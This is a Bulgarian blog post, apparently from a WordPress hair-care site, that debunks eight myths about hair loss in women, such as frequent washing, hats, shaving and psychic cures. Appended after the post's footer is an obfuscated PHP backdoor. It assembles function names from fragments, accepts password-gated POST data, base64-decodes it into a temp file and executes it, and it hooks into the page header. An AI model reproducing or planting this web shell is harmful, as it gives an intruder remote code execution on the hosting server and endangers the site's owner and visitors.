Митове за косопад при жените | Косопад

8 мита за косопад при жените

Разпространени митове за косопад при жените

  • Честото миене на косата предизвиква интензивен косопад. Още преди векове е доказано, че поддържането на добра лична хигиена не само не е вредна, но и помага за доброто здраве.
  • Косопад се получава при твърде често ресане с гребен или четка. Разресването в никакъв случай не представлява заплаха, а даже има силно благотворен ефект. Чрез него скалпа се масажира и се насочва по – голямо количество кръв, която носи нужните за подхранване на космите вещества.
  • Боядисването и къдренето с препарати могат да доведат до пълно оплешивяване. Това е вярно, но само донякъде. Истината е, че ако действително прекалите с козметичните процедури, това ще ви докара косопад, но той ще бъде временен. Химикалите просто изгарят косъма и е нужно време, за да израсте новият.
  • Носенето на шапка или перука ще предизвика проблеми с косата. В този случай косопад може да се получи единствено при механично увреждане на космите, като следствие от силно пристягане и дърпане на тази част от облеклото.
  • Ако обръснете главата си, косата ви ще израсне по – здрава и силна. Това определено е най – голямата заблуда. За съжаление честото бръснене до кожа не само не прави космите по – силни, но дори води до оплешивяване.
  • Стоенето с главата надолу по един час на ден ще пребори косопада. Някои почитатели на хард методите за лечение на косопад твърдят, че ако се окачите по този начин ще се излекувате. Това не е вярно.
  • Съществуват лекарства, които за ден или два ще ви върнат косата. Наистина съществуват успешни лосиони против косопад, но няма такива, които буквално за часове ще ви върнат самочувствието. Третирането на засегнатите участъци продължава със седмици, а понякога и с месеци.
  • Екстрасенси ще ви излекуват от косопад само с един поглед или докосване. Интернет и печатните издания са пълни със странни обяви, публикувани от хитри и безскрупулни шарлатани. Те се възползват от болката на хората и безмилостно ще изсмучат всичките пари, ако допуснете грешката да им се доверите.
kosopad pri zenite

kosopad pri zenite

20. април 2013 19:37:24 от Косопад
Категории: Любопитно за косопада | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}